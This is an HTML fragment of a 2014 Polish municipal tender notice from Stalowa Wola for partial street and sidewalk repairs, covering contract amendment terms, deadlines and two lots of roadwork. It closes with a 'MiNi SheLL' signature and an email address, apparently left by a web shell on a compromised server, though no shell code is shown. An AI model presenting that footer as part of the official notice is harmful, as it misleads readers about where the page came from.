f) odmienne od przyjętych w dokumentacji projektowej lub specyfikacji technicznej warunki
terenowe, geologiczne, wodne, istnienie niezinwentaryzowanych (nieujętych w dokumentacji)
urządzeń, instalacji lub obiektów;
g) konieczność zrealizowania robót przy zastosowaniu innych rozwiązań technicznych lub
materiałowych ze względu na zmiany obowiązującego prawa;
2) zmiana wysokości wynagrodzenia określonego w § 7 ust. 1 umowy:
a) w związku z okolicznościami wymienionymi w ust. 2 pkt 1
3) zmiana terminu realizacji przedmiotu zamówienia, w przypadku:
a) gdy wykonanie zamówienia w określonym pierwotnie terminie nie leży w interesie Zamawiającego,
b) działania siły wyższej, uniemożliwiającej wykonanie robót w określonym pierwotnie terminie,
c) zaistnienia niesprzyjających warunków atmosferycznych, uniemożliwiających wykonywanie
prac budowlanych lub spełnienie wymogów technologicznych, udokumentowanych w
dzienniku budowy, potwierdzonych przez inspektora nadzoru inwestorskiego.
d) błędów w dokumentacji projektowej, których usunięcie będzie poprzedzać konieczność
konsultacji z projektantem i naniesienia przez niego poprawek lub zmian w projekcie,
e) konieczności uzyskania decyzji lub uzgodnień, mogących spowodować wstrzymanie robót,
f) konieczności zmiany harmonogramu robót i finansowania,
g) konieczności wykonania dodatkowych badań i ekspertyz,
h) prac lub badań archeologicznych, wykopalisk, powodujących konieczność wstrzymania robót
objętych niniejszą umową,
i) realizacji w drodze odrębnej umowy prac powiązanych z przedmiotem niniejszej umowy,
wymuszającej konieczność skoordynowania prac i uwzględnienia wzajemnych powiązań, w
tym udzielenie w trakcie realizacji umowy zamówień dodatkowych i/lub uzupełniających,
związanych
z realizacją zmówienia podstawowego, mających wpływ na uzgodniony termin zakończenia
jej realizacji (powodujących konieczność jego wydłużenia),
j) wstrzymanie realizacji robót przez uprawniony organ z powodu znalezienia niewybuchów
i niewypałów,
k) jakiegokolwiek opóźnienia, utrudnienia lub przeszkody spowodowane przez lub dające
się przypisać Zamawiającemu, personelowi Zamawiającego lub innemu wykonawcy zatrudnionemu
przez Zamawiającego na teranie budowy.
4) powierzenie Podwykonawcy określonego zakresu robót na skutek którejkolwiek z okoliczności
wskazanych w pkt. 1, 2 i 3 niniejszego ustępu - i pod warunkiem, że Zamawiający nie
zastrzegł, iż dana część zamówienia nie może być powierzona Podwykonawcom,
5)zmiana przedstawicieli stron - kierownika budowy, kierowników robót, inspektorów nadzoru
- w przypadku niemożności pełnienia przez nich powierzonych funkcji (np. zdarzenia losowe,
zmiana pracy, rezygnacja, zmiana inspektora nadzoru w związku z upływem okresu na
jaki została zawarta z nim umowa i zawarciem przez Zamawiającego umowy z innym inspektorem
nadzoru).
3.Zmiany umowy przewidziane w ust. 2 dopuszczalne są na następujących warunkach:
1)ad pkt 1) - pod warunkiem nie zwiększania ceny, a ponadto w przypadku zmiany na materiały,
urządzenia i sprzęt - pod warunkiem posiadania co najmniej takich samych parametrów
jakościowych i cech użytkowych, jak te, które stanowiły podstawę wyboru oferty;
2)ad pkt 2) lit.a)- w zakresie nie powodującym zwiększenia wynagrodzenia Wykonawcy
określonego w niniejszej umowie,
3)ad pkt 3):
- lit. a) - w zakresie uzasadnionego interesu Zamawiającego,
- lit. b) - o czas działania siły wyższej oraz potrzebny do usunięcia skutków tego działania,
- lit. c) - o czas trwania niesprzyjających warunków atmosferycznych,
- lit. d), f), h), l), j), k) - o czas niezbędny do usunięcia przeszkody w prowadzeniu robót objętych
przedmiotem umowy,
- lit. e), g) - o czas niezbędny do uzyskania wymaganych decyzji bądź uzgodnień lub do wykonania
dodatkowych ekspertyz, badań,
- lit. i) - o czas opóźnienia, utrudnienia lub przeszkody opisanych przy lit. i).
4. Wszelkie zmiany niniejszej umowy wymagają zgody obu stron wyrażonej w formie pisemnego
aneksu do umowy pod rygorem nieważności.
5. Zmiany niniejszej umowy wymagają zgody obu stron wyrażonej w formie pisemnej
w postaci aneksu do umowy pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.stalowawola.pl/?c=mdPrzetargi-cmPokaz-1203<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Stalowa Wola
ul. Wolności 7,
37-450 Stalowa Wola
pokój nr 15..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.07.2014 godzina 12:00, miejsce: Urząd Miasta Stalowa Wola
ul. Wolności 7,
37-450 Stalowa Wola
pokój nr 15..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Remonty cząstkowe ulic w Stalowej Woli.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 4. Przedmiot zamówienia w zakresie Częśc i Nr I obejmuje :
- Remont cząstkowy ulic miejskich o nawierzchni bitumicznej w Stalowej Woli przy
użyciu mieszanki mineralno-bitumicznej /na gorąco/ wytwarzanej w wytwórni
mas bitumicznych.
- Remont cząstkowy ulic miejskich o nawierzchni bitumicznej w Stalowej Woli przy
użyciu mieszanki mineralno - bitumicznej wbudowywanej /na zimno/.
- Wykonywanie nakładek z mieszanki mineralno - bitumicznej o gr. 5cm.
- Mechaniczne klinowanie nawierzchni tłuczniowych z wcześniejszym wyrównaniem
równiarką - ułożenie warstwy klińca gr 5 cm przy pomocy rozściełacza mas
bitumicznych z zawałowaniem.
- Wykonanie koryta wraz z podbudową z kruszywa łamanego stabilizowanego mechanicznie
o gr 15 cm.
- Wykonanie przypowierzchniowej regulacji studzienek kanalizacji (studzienka rewizyjna,
wpust uliczny - w przypadku braku pierścienia odciążającego uzupełnić,
w przypadku uszkodzeń włazu lub wypustu należy wymienić na nowy) z rozebraniem
i odtworzeniem nawierzchni
- Wykonanie warstwy rumoszu asfaltowego lub kruszywa drogowego o grubości 5
cm przy pomocy rozściełacza mas bitumicznych z zawałowaniem (materiał Zamawiającego).
- Rozebranie krawężników betonowych o wymiarach 15x30x100 wraz z ułożeniem
nowych krawężników na ławie betonowej.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6, 45.23.31.40-2, 45.23.21.30-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Remonty cząstkowe ulic w Stalowej Woli.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia w zakresie Części Nr I I obejmuje :
- Rozebranie starej nawierzchni chodnika z kostki brukowej wraz z ułożeniem nowej
o grubości 6 cm z kostki brukowej na podsypce cementowo-piaskowej,
- Rozebranie starej nawierzchni chodnika z płytek chodnikowych o wymiarach
50x50x7 lub 35x35x5 wraz z ułożeniem nowej o grubości 6 cm z kostki brukowej
na podsypce cementowo-piaskowej,
- Wykonanie koryta wraz z podbudową z kruszywa łamanego stabilizowanego mechanicznie
o gr 15 cm,
- Rozebranie krawężników betonowych o wymiarach 15x30x100 wraz z ułożeniem
nowych krawężników na ławie betonowej,
- Rozebranie obrzeży betonowych wraz z ułożeniem nowych obrzeży gr. 8 cm na
ławie betonowej,
- Naprawa nawierzchni wykonanej z kostki kamiennej (materiały z odzysku),
- naprawa nawierzchni wykonanej z kostki brukowej -- betonowej (materiały z odzysku),
- Wykonanie nawierzchni z kostki kamiennej na podsypce cementowo-piaskowej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.11.11.00-9, 45.23.32.50-6, 45.23.32.52-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com